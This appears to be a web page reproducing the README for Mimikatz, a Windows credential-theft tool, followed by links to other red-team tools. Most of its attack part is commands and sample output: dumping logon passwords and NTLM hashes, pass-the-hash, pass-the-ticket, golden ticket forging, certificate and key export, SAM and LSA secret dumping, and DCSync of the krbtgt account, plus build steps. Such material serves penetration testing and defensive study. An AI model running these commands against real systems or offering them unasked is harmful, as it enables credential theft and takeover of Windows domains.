Mimikatz is a tool I’ve made to learn C
and make somes experiments with Windows security.
Mimikatz : A little Tool to Play with Windows Security Mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets.
mimikatz 2.0 alpha (x86) release “Kiwi en C” (Apr 6 2014 22:02:03)
Benjamin DELPY gentilkiwi
( benjamin@gentilkiwi.com )
http://blog.gentilkiwi.com/mimikatz (oe.eo)
with 13 modules * * */
mimikatz # privilege::debug
Privilege ’20’ OK
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session : Interactive from 2
User Name : Gentil Kiwi
Domain : vm-w7-ult-x
SID : S-1-5-21-1982681256-1210654043-1600862990-1000
msv :
[00000003] Primary
* Username : Gentil Kiwi
* Domain : vm-w7-ult-x
* LM : d0e9aee149655a6075e4540af1f22d3b
* NTLM : cc36cf7a8514893efccd332446158b1a
* SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
tspkg :
* Username : Gentil Kiwi
* Domain : vm-w7-ult-x
* Password : waza1234/
…
Also Read – WinPwn : Automation for Internal Windows Penetrationtest / AD-Security
log
privilege::debug
sekurlsa::logonpasswords
sekurlsa::tickets /export
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd
kerberos::list /export
kerberos::ptt c:\chocolate.kirbi
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi
crypto::capi
crypto::cng
crypto::certificates /export
crypto::certificates /export
/systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
crypto::keys /export
crypto::keys /machine /export
vault::cred
vault::list
token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert
lsadump::dcsync /user:domain\krbtgt /domain:lab.local
mimikatz
is in the form of a Visual Studio Solution and a WinDDK driver (optional for main operations), so prerequisites are:
mimikatz
and mimilib
: Visual Studio 2010, 2012 or 2013 for Desktop (2013 Express for Desktop is free and supports x86 & x64 – http://www.microsoft.com/download/details.aspx?id=44914)mimikatz driver
, mimilove
(and ddk2003
platform) : Windows Driver Kit 7.1 (WinDDK) – http://www.microsoft.com/download/details.aspx?id=11800mimikatz
uses SVN
for source control, but is now available with GIT
too! You can use any tools you want to sync, even incorporated GIT
in Visual Studio 2013 =)
Build the solution
Build
/ Build Solution
(you can change architecture)mimikatz
is now built and ready to be used! (Win32
/ x64
)MSB3073
about _build_.cmd
and mimidrv
, it’s because the driver cannot be build without Windows Driver Kit 7.1 (WinDDK), but mimikatz
and mimilib
are OK.With this optional MSBuild platform, you can use the WinDDK build tools, and the default msvcrt
runtime (smaller binaries, no dependencies)
For this optional platform, Windows Driver Kit 7.1 (WinDDK) – http://www.microsoft.com/download/details.aspx?id=11800and Visual Studio 2010 are mandatory, even if you plan to use Visual Studio 2012 or 2013 after.
Credit: Benjamin DELPY & Vincent LE TOUX
ModTask is an advanced C# tool designed for red teaming operations, focusing on manipulating scheduled…
HellBunny is a malleable shellcode loader written in C and Assembly utilizing direct and indirect…
SharpRedirect is a simple .NET Framework-based redirector from a specified local port to a destination…
Flyphish is an Ansible playbook allowing cyber security consultants to deploy a phishing server in…
A crypto library to decrypt various encrypted D-Link firmware images. Confirmed to work on the…
LLMs (e.g., GPT-3.5, LLaMA, and PaLM) suffer from hallucination—fabricating non-existent facts to cheat users without…